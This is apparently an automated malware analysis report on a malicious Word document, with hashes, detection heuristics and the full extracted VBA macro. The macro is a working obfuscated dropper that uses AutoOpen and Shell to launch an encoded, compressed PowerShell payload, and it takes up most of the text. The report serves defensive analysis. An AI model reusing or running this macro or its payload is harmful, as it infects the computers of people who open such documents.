Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 851dcf5eccb972b2…

MALICIOUS

Office (OLE)

Size: 95.2 KB
Created: 2018-06-07 12:31:00
Authoring application: Microsoft Office Word
First seen: 2018-06-21
MD5: 4c681f7d806db8974a5abf2fc2fb2d19
SHA-1: 1d7eb524228f2a7229654ef9915cdbabd4b7bbde
SHA-256: 851dcf5eccb972b282832ebdd06a2306dc13c0749914f037337ebeca9ea7fd01
Risk Score: 210

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The sample is a malicious OLE document containing a VBA macro. The macro uses an Autoopen procedure and the Shell function to execute arbitrary code, as indicated by the critical OLE_VBA_SHELL and OLE_VBA_PCODE_AUTOEXEC_EXEC heuristics. The ClamAV detection (Doc.Dropper.Agent-6576141-0) further confirms its malicious nature as a dropper. The script's obfuscation and its use of the Shell function strongly suggest that it is designed to download and execute a secondary payload.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6576141-0 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6576141-0
  • VBA macros detected (medium, 3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA (critical) OLE_VBA_SHELL
    Matched lines in script:
    / 60690 + Log(22095))
    UAEGdc = sAtLr + Shell(IHGNNUuBBX + Chr(DfYKiz + vbKeyP + VRHzfZm) + aQIksruGT + mtskklTjMNB + CCSrA + VajmBnbEKjn + iBIpsE, 55596 - 55596)
    kLUzE = Tan(wNmZu _
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro (low) OLE_VBA_AUTOOPEN
    Matched lines in script:
    End Function
    Sub Autoopen()
    On Error Resume Next
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11150 bytes
SHA-256: c9e2914a08625673da5590f498a8c9aa3d42286b3126c2b24a1d875db1a5a391
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "JEJiMOkwlw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function UAEGdc()
On Error Resume Next
PLLUh = Tan(BSHiP _
* Tan(jNOWM * Int(WEYKw * Sqr(38056) / FpoQB + Fix(47641)) / 52620 * Round(24630 / Log(25352 - wbWTn) + 11868 - STCWi)) _
/ 15883 + Log(5196))
KnnYz = Tan(Prwci _
* Tan(CFJnq * Int(vSvpo * Sqr(67651) / AscRBa + Fix(64249)) / 72790 * Round(18392 / Log(82801 - noPNhk) + 51543 - EtUMKO)) _
/ 60690 + Log(22095))
UAEGdc = sAtLr + Shell(IHGNNUuBBX + Chr(DfYKiz + vbKeyP + VRHzfZm) + aQIksruGT + mtskklTjMNB + CCSrA + VajmBnbEKjn + iBIpsE, 55596 - 55596)
kLUzE = Tan(wNmZu _
* Tan(BbsOX * Int(CDilKP * Sqr(93771) / FjjSDW + Fix(28579)) / 39361 * Round(2979 / Log(96300 - mjPTA) + 89481 - jpCSb)) _
/ 94558 + Log(73872))
End Function
Sub Autoopen()
On Error Resume Next
dIizA = Tan(CZTQj _
* Tan(WYnhZ * Int(slQmji * Sqr(82006) / iHcnEj + Fix(61194)) / 77994 * Round(85644 / Log(12803 - CzQkKv) + 6933 - aoHBV)) _
/ 85897 + Log(63424))
UAEGdc
AwqYw = Tan(BWuzj _
* Tan(zohjj * Int(XzcBGr * Sqr(61492) / QLbFG + Fix(89604)) / 44842 * Round(59231 / Log(59639 - Bistwt) + 79220 - OrVlG)) _
/ 52929 + Log(40948))
End Sub



Attribute VB_Name = "Vjbzszshrpv"
Function aQIksruGT()
On Error Resume Next
tWsDR = Tan(VXBow _
* Tan(NWChE * Int(drKwj * Sqr(52804) / TrEwz + Fix(12592)) / 68338 * Round(48023 / Log(19723 - tFdFO) + 19736 - YHjJE)) _
/ 876 + Log(37312))
hjKYw = "owers" + "HeLL " + "-e KAAgA" + "E4ARQB3" + "AC0ATwB"
VVsjz = Tan(qRlwSQ _
* Tan(ChMAD * Int(IbawP * Sqr(63969) / YZrIOq + Fix(71025)) / 96420 * Round(58661 / Log(71929 - pMRDos) + 14182 - toWZWJ)) _
/ 1439 + Log(84828))
mwZiTEvvnT = "iAGoAZQB" + "DAFQAIABpA" + "E8ALgBzAHQ" + "AUgB" + "lAEEAbQBSAE" + "UAQ" + "QBEAGUAUgAoACA" + "AKAAgAE4ARQB3" + "AC0" + "AT"
ZuWcC = Tan(YQZcj _
* Tan(faXwVL * Int(qFmhrT * Sqr(76610) / BzUzN + Fix(97273)) / 50273 * Round(48334 / Log(69369 - OnMsm) + 29438 - XTNNw)) _
/ 56608 + Log(1976))
CUMLD = "wB" + "iAGoAZQBDAFQ" + "AIAAgAGkATwAu" + "AEMATwBNAFAA"
KBFmMf = Tan(OsXRE _
* Tan(VdFBnh * Int(XizSX * Sqr(34155) / AauCW + Fix(38344)) / 3121 * Round(7298 / Log(94444 - mXjFZ) + 38463 - VKnCq)) _
/ 14936 + Log(22598))
pBGihKDKCi = "cgBlA" + "HMAcwBJAG8ATg" + "AuA" + "EQARQBGAEwAQQB" + "UAGUAc" + "wB0AFIARQBhAE0" + "AKABbAFMA" + "WQBzAFQ"
wtafD = Tan(OuLInz _
* Tan(vkbRj * Int(OQzBwK * Sqr(54450) / MiRKSi + Fix(84014)) / 49940 * Round(50535 / Log(52106 - thYcY) + 94717 - WBZaLk)) _
/ 18746 + Log(43291))
oSjGYmwLjB = "ARQBNAC4Aa" + "QB" + "PAC4ATQBFAG0Ab" + "wByAH" + "kAcwB0AHIAZQBhA" + "G0AXQBbAE" + "MATwBuAFYAZ" + "QByAFQAXQ"
vwrcVb = Tan(BQuzVP _
* Tan(VKAtmD * Int(nYEMob * Sqr(45356) / ShAwlw + Fix(52411)) / 66167 * Round(97741 / Log(4824 - rWMiz) + 30562 - YEQLq)) _
/ 44044 + Log(35994))
fPwMuMUzwwS = "A6ADoAZgBSAG8" + "ATQBiAEEA" + "cwBlADYANA" + "BzAHQA" + "UgBpAG4A"
aQIksruGT = hjKYw + mwZiTEvvnT + CUMLD + pBGihKDKCi + oSjGYmwLjB + fPwMuMUzwwS
End Function
Function mtskklTjMNB()
On Error Resume Next
HZnPh = Tan(SPzMz _
* Tan(djubB * Int(ULUauF * Sqr(94372) / CTWGqd + Fix(56394)) / 60854 * Round(78280 / Log(2684 - jVSZGO) + 33637 - qisKo)) _
/ 19793 + Log(98052))
MjJzzQjfnLq = "ZwAoAC" + "AAJwBYAFoAQgB" + "kA" + "FQAOABJAHcAR"
Gmhfi = Tan(Azwtq _
* Tan(Twzrs * Int(RWCmNL * Sqr(55650) / GCKIh + Fix(93656)) / 84208 * Round(52986 / Log(43425 - HVMRUU) + 51648 - Yviuj)) _
/ 1578 + Log(33820))
rrVQLmsFawQ = "gBJAGIALwBTAG" + "kAKw" + "BXAE" + "QAS" + "wBLADA" + "AZwBzAFEAbw" + "BpADQAawBp" + "AG8ATQBhAGgAR" + "QBCAEMA"
sczUY = Tan(CfLzm _
* Tan(LtirZD * Int(WTABiL * Sqr(595) / hUMWJr + Fix(50747)) / 8234 * Round(28979 / Log(53824 - VmThF) + 44394 - kBiQqV)) _
/ 55478 + Log(32768))
RNVGQRHSnw = "TQBNAF" + "QA" + "RgB" + "kAGQAO" + "ABhA" + "EsAVwA3AH" + "QAMABoADIAMQB" + "JA" + "CsATwA4AFcAUQBT"
nrbRJY = Tan(UKzbdw _
* Tan(pPPXiz * Int(muiAa * Sqr(97312) / Qdrts + Fix(93124)) / 74405 * Round(23918 / Log(76800 - swEwX) + 11521 - ElQoBa)) _
/ 95370 + Log(88465))
OFYtw = "ADYAOABhAG" + "QASQA" + "rADcALw" + "BuA" + "G8ANAA3" + "AHoA"
rBwwR = Tan(ZYEhIi _
* Tan(CwdbFi * Int(sEOoiw * Sqr(78268) / UPCtzY + Fix(9491)) / 71152 * Round(29934 / Log(83290 - KXjuqz) + 25927 - jSLaV)) _
/ 36534 + Log(15243))
VjMtsBH = "TgB5AHAAZ" + "QBTAF" + "gAQgBNAEY" + "AWg" + "BVAE0ASA" + "BTAHgA" + "QgBJAEQARgBlAG" + "gA" + "VAB" + "qAD"
mmHNVt = Tan(EpiPiL _
* Tan(NNkMUO * Int(KYrVc * Sqr(10109) / Iohar + Fix(95160)) / 34961 * Round(96523 / Log(14768 - YQfbFL) + 65945 - HlEwqJ)) _
/ 97336 + Log(86488))
IizNaqjXE = "EAbgBNAFA" + "AWgBmAC8ANg" + "BIAEoAT" + "wBrAG"
cNQss = Tan(bwAzor _
* Tan(fPFGn * Int(jkFNJ * Sqr(82255) / TLKwY + Fix(53542)) / 96919 * Round(66147 / Log(80387 - rlfbDf) + 9156 - tntGp)) _
/ 85102 + Log(68634))
Yvhji = "QASQA" + "2AFQAT" + "QBnAG4" + "AVQBOAH" + "cAbAAwAGgA" + "UQA2" + "AEQAbgA5ADQ" + "AbgB1AFk" + "AMgBhAEE"
mtskklTjMNB = MjJzzQjfnLq + rrVQLmsFawQ + RNVGQRHSnw + OFYtw + VjMtsBH + IizNaqjXE + Yvhji
End Function
Function CCSrA()
On Error Resume Next
uJiXA = Tan(BYVQm _
* Tan(ZMtfp * Int(OVIcfF * Sqr(865) / PDbMVR + Fix(28634)) / 4938 * Round(64054 / Log(78543 - SjkjH) + 12110 - tCpjuN)) _
/ 32826 + Log(19968))
NXPAMa = "AYgBJAD" + "IAW" + "QBkAHgAZ" + "wBxAHUA" + "ZQBBAE" + "0ASwB" + "5ADMASwBxAEU" + "AcwBiAF" + "AAdQAyAEsAb" + "wBXACsAegBtA"
ONSiYW = Tan(rzwIu _
* Tan(mWfEb * Int(vilBW * Sqr(84728) / zIiJN + Fix(91640)) / 22145 * Round(77298 / Log(975 - PKfvhs) + 72437 - ztYPT)) _
/ 2456 + Log(80382))
FBfiKbtzvRI = "Gc" + "ARgBOAHAAV" + "gBu" + "AG0A" + "TwBQAEkA"
uOzcMv = Tan(MZtIoj _
* Tan(ijmjQ * Int(wbOlAq * Sqr(47076) / nhphTc + Fix(2871)) / 93492 * Round(78326 / Log(45793 - TYSWok) + 94828 - kKsdmk)) _
/ 93049 + Log(78123))
XGDKRQ = "cQBrAFc" + "Ab" + "ABDAGgA" + "VQ" + "A5" + "AGEA"
AOcVX = Tan(YrDaUG _
* Tan(mrODz * Int(iEZAC * Sqr(29732) / puEDwX + Fix(76285)) / 66017 * Round(91968 / Log(51064 - Hvltfk) + 18278 - UZXBOi)) _
/ 76819 + Log(53573))
tjWzonM = "TAArAHUAdQB" + "IAHUAWAA5AE0A" + "RwBKADMA" + "agBLAHAAUQA2" + "AHAANABLAHoA" + "ZAAxA" + "DYASgB0ADMAWgB6" + "AG"
OaNZG = Tan(zinziz _
* Tan(dqQTv * Int(ikZpr * Sqr(49936) / ORtpVI + Fix(91446)) / 56308 * Round(37433 / Log(40237 - VBMoP) + 83600 - ffAwhk)) _
/ 91123 + Log(74926))
hdcVTsrwD = "QAaABzAG" + "YAZQB" + "TAGcATABN" + "AEk" + "AdABkAGYANwBt" + "AEkA" + "aw" + "BTAHAAQQAxAGgAM"
tZplVz = Tan(Vjkwi _
* Tan(BpJVD * Int(tpuVhD * Sqr(23397) / uSkIti + Fix(42191)) / 4304 * Round(6736 / Log(57364 - rVrrHi) + 86611 - JdKmL)) _
/ 63631 + Log(94371))
sAPsuIPw = "gBOAHcAagB2AGQ" + "ATwBuAHMAN" + "gBoAGsAcQBaA" + "EoASgB" + "BAHUAdQBhAEo" + "AUwBSAFoAcABW"
CCSrA = NXPAMa + FBfiKbtzvRI + XGDKRQ + tjWzonM + hdcVTsrwD + sAPsuIPw
End Function
Function VajmBnbEKjn()
On Error Resume Next
zwEHiJ = Tan(QCwcE _
* Tan(zzmfmM * Int(Cwmqoz * Sqr(5017) / jjYbw + Fix(78544)) / 46698 * Round(6426 / Log(97882 - AhPao) + 21733 - oKJiY)) _
/ 12539 + Log(47959))
ukkSaSaKm = "AFYAMwA0AHoANgB" + "BAGEAS" + "wB1AFgAUwBT" + "AEoA" + "UgBK" + "AHIANwBvADEAY" + "gA" + "5ADUAegBIA"
TqzMO = Tan(kHphW _
* Tan(AHHbw * Int(JliNbJ * Sqr(52928) / AmslKZ + Fix(99527)) / 13124 * Round(55285 / Log(96328 - rkCPa) + 50638 - RnBjCi)) _
/ 66540 + Log(70984))
kwsDOOk = "CsAOABGAFMAM" + "gBOADIAZAB" + "YAHgARw" + "AyAFY" + "AWQBXADEANQB" + "pAG0AN"
nqGOpk = Tan(SzODW _
* Tan(XtfJCE * Int(HVEni * Sqr(84422) / mTkKDZ + Fix(55742)) / 24013 * Round(32348 / Log(42945 - iGKjSL) + 43913 - UPIBs)) _
/ 61023 + Log(57373))
jREPusmrbJV = "QBQAEwAKwA0AGIA" + "TABjAHQAbg" + "A4AFYAVAAv" + "AEIANwB0AEEAcQB" + "DAEsAagB2ADEA"
pRlTjz = Tan(nwNEAw _
* Tan(LcIaT * Int(rXDsQL * Sqr(44270) / dSriZ + Fix(83961)) / 75951 * Round(90220 / Log(60264 - CkJXl) + 8701 - WaAEf)) _
/ 85290 + Log(35868))
YzViuQ = "OABSAG" + "sANg" + "BJACsAKwB" + "IAGEAOAAx" + "AEIAcgByA" + "HgAUQB" + "xAGMATAAxAEkARw" + "ArAEEAaQ"
fqSNs = Tan(UaYJj _
* Tan(ZbEjQ * Int(FXioUm * Sqr(98402) / tlWTwa + Fix(47758)) / 35972 * Round(87585 / Log(2233 - hmAhJ) + 71668 - EiivV)) _
/ 39346 + Log(76923))
SrHRjZ = "ByAGoAb" + "AArA" + "EcASwB5AFcAWQ" + "B5AEk" + "AVgAyAGEAdQ" + "BwAGIAO" + "QBDAHMATgAzAH" + "UAZgB0AEsAZABM" + "AGwA" + "VwB"
mvcrWj = Tan(HIjEF _
* Tan(FzGhD * Int(jKFpZ * Sqr(5412) / hQCwP + Fix(3157)) / 60670 * Round(31644 / Log(76416 - pBfoSi) + 83375 - FjBwlb)) _
/ 26852 + Log(34030))
bBBSNKY = "nAGUARABt" + "AF" + "EAQ" + "wB" + "mADEARQA2ADEAU" + "gBNADAAMQ" + "BrAGEAdABmAGsA" + "bwBPAEkAKwB"
EWhFD = Tan(OzwEKU _
* Tan(ZvSTR * Int(YWRjOr * Sqr(38250) / Fifbk + Fix(96031)) / 85582 * Round(51871 / Log(87502 - YlMQp) + 38983 - jdBGG)) _
/ 63067 + Log(34479))
sizzzjiQtGQ = "2AGUAQgBM" + "AG4AQgB4" + "AHMAaABvAEEA" + "WABuACsAOQArAHc" + "ARgBk" + "AHMAaQBYAHQAeAB" + "VAGMAUgBiAHc" + "AcABqAFUA"
itmnq = Tan(NkSJQ _
* Tan(daWKw * Int(LufSI * Sqr(62787) / GhORQw + Fix(2862)) / 25753 * Round(33475 / Log(4161 - FnCnL) + 3645 - GZBwGH)) _
/ 83111 + Log(15044))
EmXmbFS = "UgBvAHgA" + "RgBZAFgAYwB" + "UADUAcA" + "B2AHgASwBRAG8" + "AZAB" + "TAEsARABtADAA" + "RgBY" + "ADQAQwA" + "zADMAZgA0A"
VXfPk = Tan(qklzS _
* Tan(KPFLX * Int(ELwXj * Sqr(56297) / BHvKa + Fix(13276)) / 51452 * Round(16204 / Log(87511 - qmmUzw) + 35802 - LjsvJ)) _
/ 92654 + Log(70110))
IwHGj = "EEAJwAg" + "ACkAIAAsACAAWw" + "BTAHkAc" + "wB0AEUAbQAuA" + "EkAbwAuAGMATw" + "BNAHAAUgBlAHMA" + "cwBpAE8" + "AbgAuAGMATwBt" + "AHAAUgBlA" + "FMA"
pmwGzn = Tan(rjwva _
* Tan(srtRj * Int(ZlzFO * Sqr(61831) / XtiFz + Fix(98307)) / 49295 * Round(83462 / Log(32698 - LnjDku) + 71536 - BsqTs)) _
/ 98797 + Log(58633))
sBZiSr = "cwBJAE8ATgBNAG8" + "AZABlAF0AOg" + "A6AEQA" + "RQBjA" + "G8"
VajmBnbEKjn = ukkSaSaKm + kwsDOOk + jREPusmrbJV + YzViuQ + SrHRjZ + bBBSNKY + sizzzjiQtGQ + EmXmbFS + IwHGj + sBZiSr
End Function
Function iBIpsE()
On Error Resume Next
hKzshi = Tan(bPIMdA _
* Tan(ATbChi * Int(LoqMD * Sqr(24651) / fEAfbX + Fix(34431)) / 28371 * Round(87970 / Log(46784 - dMHnc) + 65286 - AFsWs)) _
/ 80179 + Log(33917))
bnlHRd = "AbQBwAFIAZ" + "QBzAFMAIAApACk" + "AIAAsACAAWwBU" + "AGUAWABUA"
aVVHj = Tan(VmvLHh _
* Tan(dilaC * Int(ERsXMI * Sqr(7784) / HvJLL + Fix(26901)) / 52037 * Round(93209 / Log(93138 - mrdHaM) + 55412 - AGXaG)) _
/ 92626 + Log(79849))
rDbYjizDuus = "C4AZQBOAGMA" + "TwBEAEk" + "AbgBnAF0AOgA6AG" + "EAUwBDAGkAaQAp" + "ACAAKQAu" + "AFI" + "AZQBhAEQAdABPAE" + "UATg" + "BEACgAIA" + "ApACAA"
NiizJw = Tan(aNqlzw _
* Tan(ajhsn * Int(Swqfv * Sqr(84358) / zfjpN + Fix(42733)) / 33083 * Round(1310 / Log(84862 - wjoPC) + 88263 - adYhfq)) _
/ 86626 + Log(25791))
itDJESzTq = "fAAgACYAIAAoACA" + "AJABwAHMAaA" + "BvAE0AZQBbADI" + "AMQBdACsAJAB" + "wAFMAaA" + "BvAG0AZQB"
ibQrD = Tan(Rqivh _
* Tan(YdfSi * Int(jJzwP * Sqr(4908) / ERTaS + Fix(78893)) / 76082 * Round(53637 / Log(8876 - pjAKwS) + 95785 - HMhCAt)) _
/ 29061 + Log(93285))
XVFaYa = "bADMAMABdA" + "CsAJwB4AC" + "cAKQA="
iBIpsE = bnlHRd + rDbYjizDuus + itDJESzTq + XVFaYa
End Function